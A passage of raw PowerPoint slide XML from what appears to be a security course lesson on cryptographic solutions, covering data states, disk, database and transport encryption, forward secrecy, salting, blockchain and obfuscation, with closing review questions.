              <a:t>You are providing consultancy to a firm to help them implement smart card authentication to premises networks and cloud services. What are the main advantages of using an HSM over server-based key and certificate management services?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7039857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720D7-2C48-BDAA-659E-5D9AE77B0C8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Topic 3C - Cryptographic Solutions</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{201C4F2A-7B03-7438-2D3B-7AD5B6FE7A56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="2249486"/>
            <a:ext cx="9905999" cy="4267427"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Encryption Supporting Confidentiality</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If data is encrypted, it does not matter if the disk storing the information is stolen or if it can be intercepted when it is transferred over a network, because the threat actor will not be able to understand or change what has been stolen. This use of encryption fulfills the goal of confidentiality.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When deploying a cryptographic system to protect data assets, consideration must be given to all the ways that information could potentially be intercepted. Data can be described as being in one of three states:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data at rest—is the state when the data is in some sort of persistent storage media.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data in transit (or data in motion)—is the state when data is transmitted over a network.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data in use (or data in processing)—is the state when data is present in volatile memory, such as system RAM or CPU registers and cache.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24981558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BFF6B-03B2-9DF5-F35F-411705012D41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Disk and File Encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC86BE33-AAC9-6B8C-7C49-E10ED46AA5C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data at rest encompasses a great many storage mechanisms. These can be thought of in terms of encryption levels. Lower levels, such as encrypting a whole disk, have the advantage of simplicity, but can be complex to manage when multiple users need to access the data. Higher levels, such as applying encryption via the file system or via a database management system, can be combined with granular access controls.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Full Disk and Partition Encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Volume and File Encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="649617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E7CF-6AC7-A19C-6867-950C485D7971}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Database Encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA7228FB-4C9F-B7B6-3694-8F3902129ADC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="1843314"/>
            <a:ext cx="9905999" cy="4557486"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A structured database stores data in tables. Each table is composed of column fields with a given data type. Records are stored as rows in the table with a value entered for each field. The table data is ultimately stored as files on a volume, but access is designed to be mediated through a database management system (DBMS) running a database language such as Structured Query Language (SQL). Typically, the database is hosted on a server and accessed by client applications.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The underlying files could be protected by a disk or volume encryption product running on the server. This will typically have an adverse impact on performance, so encryption is more commonly implemented by the DBMS or by a plug-in.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encryption can be applied at different granular levels. While each DBMS supports different features, the following encryption options, based on Microsoft’s SQL Server DBMS, are typical.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Database-Level Encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Record-Level Encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14788307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8CBF4-30D1-64C6-9872-64CF98CB9B46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Transport Encryption and Key Exchange</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 212">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E68ACE84-A6A6-807F-6B63-18929C4D5524}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1901372" y="1729771"/>
            <a:ext cx="7736114" cy="4912705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="833747141"/>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3A46D-8942-C4E2-CCD0-7F0AFB4FFD21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Perfect Forward Secrecy</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 214">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C568ADFE-48D8-0A4F-7E3F-C1A25DE5C742}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1611086" y="1741715"/>
            <a:ext cx="7953827" cy="4992914"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1765372780"/>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8EF0F-A5C3-9F4A-09B5-D284E2605A70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Salting and Key Stretching</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48EBA46D-F2D8-7D23-806C-A5EDB1169D0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624114" y="1741714"/>
            <a:ext cx="10711543" cy="4891315"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The values used for a private key or secret key must be selected at random. If there is something predictable about the way the value of the key was derived, it has less entropy. Low entropy is a particular concern whenever a cryptographic system makes use of user-generated data, such as a password. Users tend to select low entropy passwords, because they are easier to remember. This type of data is too short and too ordered to be a good “seed” for key generation. Salting and key stretching help to protect password-derived cryptographic secrets from discovery through cryptanalysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Salting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="174625" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Both these attacks can be slowed down by adding a salt value when creating the hash. A salted hash is computed as follows:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="174625" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>(salt + password) * SHA = hash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Key Stretching</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36160679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A54BD-D0AB-5BB9-6F7D-916D93122154}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Blockchain</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94CD62F7-C257-AC10-0B28-B37DFD1C6A8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="2249486"/>
            <a:ext cx="9905999" cy="4252913"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blockchain is a concept in which an expanding list of transactional records is secured using cryptography. Each record is referred to as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>block </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and is run through a hash function. The hash value of the previous block in the chain is added to the hash calculation of the next block in the chain. This ensures that each successive block is cryptographically linked. Each block validates the hash of the previous block all the way through to the beginning of the chain, ensuring that each historical transaction has not been tampered with. In addition, each block typically includes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a time stamp of one or more transactions as well as the data involved in the transactions themselves.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blockchain technology has a variety of potential applications. It can ensure the integrity and transparency of financial transactions, legal contracts, copyright and intellectual property (IP) protection, online voting systems, identity management systems, and data storage.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25054204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E6CB7-0096-C0ED-4564-AF315D6F8DFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Obfuscation</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C8F1CF3-947D-0EF9-9F72-0469B2225060}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Obfuscation is the art of making a message or data difficult to find. It is security by obscurity, which is normally deprecated. There are some uses for obfuscation technologies, however:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Steganography </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data masking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tokenization </a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3093615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8F5DF-222B-355F-DC43-40AEB27E01FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ACCESS CONTROL</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFCC5FBD-BE8F-0F43-D8C0-8B6C3C73A30E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1107365" y="1488281"/>
            <a:ext cx="7485092" cy="5355099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20251653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9A507-E63E-3FBD-638E-1316D9F4CAB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Review Activity: Cryptographic Solutions</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2216639-4436-3F49-4C3E-6E8114B287BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In an FDE product, what type of cipher is used for a key encrypting key?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>True or False? Perfect Forward Secrecy (PFS) ensures that a compromise of a server’s private key will not also put copies of traffic sent to that server in the past at risk of decryption.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why does Diffie-Hellman underpin Perfect Forward Secrecy (PFS)?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>True or false? It is essential to keep a salt value completely secret to prevent recovery of a password from its hash.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8121883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C6216-CBB1-118E-64C1-9B8C96B3E002}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Lesson 3 - Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C340A0F-E2A7-0EB9-A67C-4AD58F63D9A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537030" y="1741714"/>
            <a:ext cx="10510382" cy="5116285"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
